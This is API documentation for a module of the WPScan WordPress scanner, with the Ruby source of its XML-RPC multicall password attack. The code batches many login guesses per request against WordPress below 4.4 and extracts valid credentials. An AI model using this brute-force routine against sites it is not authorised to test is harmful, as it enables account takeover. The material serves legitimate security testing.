Class: WPScan::Finders::Passwords::XMLRPCMulticall

Inherits:

CMSScanner::Finders::Finder

• Object
• CMSScanner::Finders::Finder
• WPScan::Finders::Passwords::XMLRPCMulticall

Defined in:

app/finders/passwords/xml_rpc_multicall.rb

Overview

Password attack against the XMLRPC interface with the multicall method WP < 4.4 is vulnerable to such attack

Instance Method Summary

• #attack(users, passwords, opts = {}) {|CMSScanner::User| ... } ⇒ Object

  TODO: Make rubocop happy about metrics etc.

• #check_and_output_errors(res) ⇒ Object
• #do_multi_call(users, passwords) ⇒ Typhoeus::Response
• #passwords_size(max_passwords, users_size) ⇒ Object

  rubocop:disable all.

Instance Method Details

#attack(users, passwords, opts = {}) {|CMSScanner::User| ... } ⇒ Object

TODO: Make rubocop happy about metrics etc

rubocop:disable all

Options Hash (opts):

• :show_progression (Boolean)
• :multicall_max_passwords (Integer)

Yields:

• (CMSScanner::User) —

  When a valid combination is found

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 34

def attack(users, passwords, opts = {})
  wordlist_index         = 0
  max_passwords          = opts[:multicall_max_passwords]
  current_passwords_size = passwords_size(max_passwords, users.size)

  create_progress_bar(total: (passwords.size / current_passwords_size.round(1)).ceil,
                      show_progression: opts[:show_progression])

  loop do
    current_users     = users.select { |user| user.password.nil? }
    current_passwords = passwords[wordlist_index, current_passwords_size]
    wordlist_index   += current_passwords_size

    break if current_users.empty? || current_passwords.nil? || current_passwords.empty?

    res = do_multi_call(current_users, current_passwords)

    progress_bar.increment

    check_and_output_errors(res)

    # Avoid to parse the response and iterate over all the structs in the document
    # if there isn't any tag matching a valid combination
    next unless res.body =~ /isAdmin/ # maybe a better one ?

    Nokogiri::XML(res.body).xpath('//struct').each_with_index do |struct, index|
      next if struct.text =~ /faultCode/

      user = current_users[index / current_passwords.size]
      user.password = current_passwords[index % current_passwords.size]

      yield user

      # Updates the current_passwords_size and progress_bar#total
      # given that less requests will be done due to a valid combination found.
      current_passwords_size = passwords_size(max_passwords, current_users.size - 1)

      if current_passwords_size == 0
        progress_bar.log('All Found') # remove ?
        progress_bar.stop
        break
      end

      progress_bar.total = progress_bar.progress + ((passwords.size - wordlist_index) / current_passwords_size.round(1)).ceil
    end
  end
  # Maybe a progress_bar.stop ?
end

#check_and_output_errors(res) ⇒ Object

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 92

def check_and_output_errors(res)
  progress_bar.log("Incorrect response: #{res.code} / #{res.return_message}") unless res.code == 200

  progress_bar.log('Parsing error, might be caused by a too high --max-passwords value (such as >= 2k)') if res.body =~ /parse error. not well formed/i

  progress_bar.log('The requested method is not supported') if res.body =~ /requested method [^ ]+ does not exist/i
end

#do_multi_call(users, passwords) ⇒ Typhoeus::Response

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 11

def do_multi_call(users, passwords)
  methods = []

  users.each do |user|
    passwords.each do |password|
      methods << ['wp.getUsersBlogs', user.username, password]
    end
  end

  target.multi_call(methods).run
end

#passwords_size(max_passwords, users_size) ⇒ Object

rubocop:disable all

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 84

def passwords_size(max_passwords, users_size)
  return 1 if max_passwords < users_size
  return 0 if users_size == 0

  max_passwords / users_size
end